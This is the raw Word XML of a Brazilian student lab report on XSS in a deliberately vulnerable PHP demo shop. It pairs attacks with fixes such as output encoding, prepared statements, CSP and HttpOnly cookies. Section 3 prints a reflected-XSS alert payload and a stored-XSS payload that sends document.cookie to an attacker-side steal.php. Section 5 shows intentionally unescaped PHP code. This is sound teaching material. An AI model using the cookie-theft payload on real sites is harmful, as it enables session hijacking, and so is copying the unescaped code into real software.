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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Instituto Federal de Brasília</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tecnólogo em Sistemas para Internet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Segurança em Aplicações — 2026/1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0a7d2c"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Artefato Sprint 2 — XSS (Cross-Site Scripting)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Grupo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[Nome do grupo ou numeração]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Integrantes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[Nome completo]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[Matrícula]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[Nome completo]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[Matrícula]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[Nome completo]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[Matrícula]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[Nome completo]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[Matrícula]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Prof. Dr. Diógenes Ferreira Reis Fustinoni</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0a7d2c"/>
        </w:rPr>
        <w:t xml:space="preserve">Seção 1 — Descrição da Aplicação</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nome da aplicação: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LojaExpress (ambiente de demonstração).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Propósito: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Pequena vitrine de e-commerce com busca de produtos, mural de comentários de clientes e saudação personalizada. Foi construída intencionalmente vulnerável para o estudo de XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tecnologias utilizadas: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTML + CSS + JavaScript (Vanilla) no front-end; PHP 8 no back-end; MySQL (MariaDB) como banco de dados; servidor Apache via XAMPP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Estrutura do banco de dados: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Tabela usuarios (id, nome, email, role) — dados que podem ser exfiltrados.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Tabela comentarios (id, autor, texto, data_criacao) — alimenta o Stored XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Como executar: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Importar banco.sql no phpMyAdmin, copiar as pastas para htdocs e acessar http://localhost/codigo-vulneravel/index.php (passo a passo completo no README.md).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot da aplicação em funcionamento normal: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[inserir print da tela inicial antes de qualquer ataque]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0a7d2c"/>
        </w:rPr>
        <w:t xml:space="preserve">Seção 2 — Pontos de XSS Identificados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600"/>
        <w:gridCol w:w="3600"/>
        <w:gridCol w:w="2760"/>
        <w:gridCol w:w="2400"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Localização</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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24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 de XSS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Campo de comentário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texto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Stored XSS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Página de busca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nome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Reflected XSS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Saudação (URL)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user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DOM-based (bônus)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a7d2c"/>
        </w:rPr>
        <w:t xml:space="preserve">Seção 3 — Ataques Documentados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Ataque 1 — Reflected XSS na busca</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivo do ataque: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Executar JavaScript arbitrário no navegador da vítima a partir de um link malicioso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tipo de XSS: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Reflected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Contexto da injeção: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">conteúdo de texto HTML — o valor do parâmetro nome é concatenado dentro de um &lt;h2&gt; sem escape.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Payload utilizado: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&lt;script&gt;alert('Reflected XSS')&lt;/script&gt;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Resultado: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o alerta é exibido; qualquer JS pode rodar (redirecionamento, roubo de dados, etc.). Basta enviar à vítima a URL reflected.php?nome=&lt;script&gt;...&lt;/script&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Análise STRIDE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">T (Tampering — altera o conteúdo exibido) e I (Information Disclosure — pode ler dados da página/cookies).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshots: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[antes]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[payload inserido]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[script executado]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Ataque 2 — Stored XSS no comentário (com roubo de cookie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivo do ataque: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Injetar um script persistente que rouba o cookie de sessão de todos os visitantes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tipo de XSS: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Stored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Contexto da injeção: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">conteúdo de texto HTML — o comentário é salvo no banco e impresso sem escape a cada visita.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Payload utilizado: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&lt;script&gt;new Image().src='steal.php?c='+document.cookie&lt;/script&gt;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Resultado: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o cookie de sessão (sem HttpOnly) é enviado ao servidor do atacante (steal.php) e registrado em cookies_roubados.txt. O script roda para todo visitante que abrir a página.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Análise STRIDE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">S (Spoofing — com o cookie o atacante se passa pela vítima), I (Information Disclosure — vazamento do cookie) e T (Tampering — modifica a página para todos).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshots: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[antes]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[payload inserido]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[cookie capturado em cookies_roubados.txt]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0a7d2c"/>
        </w:rPr>
        <w:t xml:space="preserve">Seção 4 — Análise de Impacto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tabela STRIDE consolidada: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76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Ataque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:shd w:fill="0a7d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Reflected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 (bônus)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Impacto nos dados: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cookies de sessão e quaisquer dados exibidos na página podem ser lidos e exfiltrados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto no negócio: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sequestro de contas (inclusive a de administrador), perda de confiança dos clientes, desfiguração do site e uso da loja para distribuir malware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Contexto LGPD: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o vazamento de dados pessoais (Lei nº 13.709/2018) pode gerar sanções da ANPD — advertência, multa de até 2% do faturamento (limitada a R$ 50 milhões por infração) e obrigação de notificar os titulares.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0a7d2c"/>
        </w:rPr>
        <w:t xml:space="preserve">Seção 5 — Correções Implementadas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Correção do ponto 1 — Reflected (output encoding)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Código vulnerável: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$nome = $_GET['nome'] ??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"&lt;h2&gt;Resultados para: " . $nome . "&lt;/h2&gt;";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Código corrigido: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$nome = $_GET['nome'] ??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$nome_seguro = htmlspecialchars($nome, ENT_QUOTES, 'UTF-8');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"&lt;h2&gt;Resultados para: " . $nome_seguro . "&lt;/h2&gt;";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Explicação: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">htmlspecialchars() converte &lt; &gt; " ' &amp; em entidades HTML (&amp;lt; &amp;gt; …). O navegador passa a exibir o texto em vez de interpretá-lo como tag, então o &lt;script&gt; não é executado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Correção do ponto 2 — Stored (prepared statement + escape)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Código vulnerável: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$sql = "INSERT INTO comentarios (autor, texto) VALUES ('$autor', '$texto')";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$conn-&gt;query($sql);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'&lt;p&gt;' . $row['texto'] . '&lt;/p&gt;';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Código corrigido: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$stmt = $conn-&gt;prepare("INSERT INTO comentarios (autor, texto) VALUES (?, ?)");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$stmt-&gt;bind_param("ss", $autor, $texto);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$stmt-&gt;execute();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$texto = htmlspecialchars($row['texto'], ENT_QUOTES, 'UTF-8');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'&lt;p&gt;' . $texto . '&lt;/p&gt;';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Explicação: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o prepared statement trata a entrada como dado (bloqueando também SQL Injection) e o htmlspecialchars() na exibição impede que o conteúdo salvo seja interpretado como HTML/script. Técnica diferente da usada no ponto 1 (que só escapava na saída).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Defesas adicionais (camadas extras)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DOM-based: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">troca de innerHTML por textContent (trata o valor como texto puro).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Content-Security-Policy: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">header com script-src 'self' bloqueia scripts inline mesmo que um payload passe.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Cookie HttpOnly: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o JavaScript não consegue mais ler document.cookie, anulando o roubo de cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Verificação da correção: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ao reenviar os mesmos payloads na versão corrigida, o script aparece como texto literal e não executa; o Console do navegador registra o bloqueio da CSP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[inserir print do payload falhando na versão corrigida]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0a7d2c"/>
        </w:rPr>
        <w:t xml:space="preserve">Seção 6 — Conclusão</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lições aprendidas: toda entrada de usuário é não confiável e precisa ser tratada tanto na saída (output encoding) quanto na persistência. Um único ponto sem escape é suficiente para comprometer a aplicação inteira.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impacto no mundo real: XSS está historicamente no OWASP Top 10 e permite desde defacement até sequestro completo de contas, com reflexos diretos de LGPD quando há dados pessoais.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dificuldades encontradas: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="b00020"/>
          <w:highlight w:val="yellow"/>
          <w:highlightCs w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[descreva o que foi mais difícil e como o grupo resolveu]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">O que faríamos diferente em um projeto real: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">adotar um framework com escape automático, revisão de código e CSP desde o início, em vez de corrigir depois.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0a7d2c"/>
        </w:rPr>
        <w:t xml:space="preserve">Referências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OWASP. Cross Site Scripting (XSS) Prevention Cheat Sheet.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PortSwigger. Cross-Site Scripting (XSS) — Web Security Academy.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MDN. Cross-site scripting (XSS).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BRASIL. Lei nº 13.709/2018 — Lei Geral de Proteção de Dados (LGPD).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2026-10-07T03:12:47.994Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-07T03:12:48.004Z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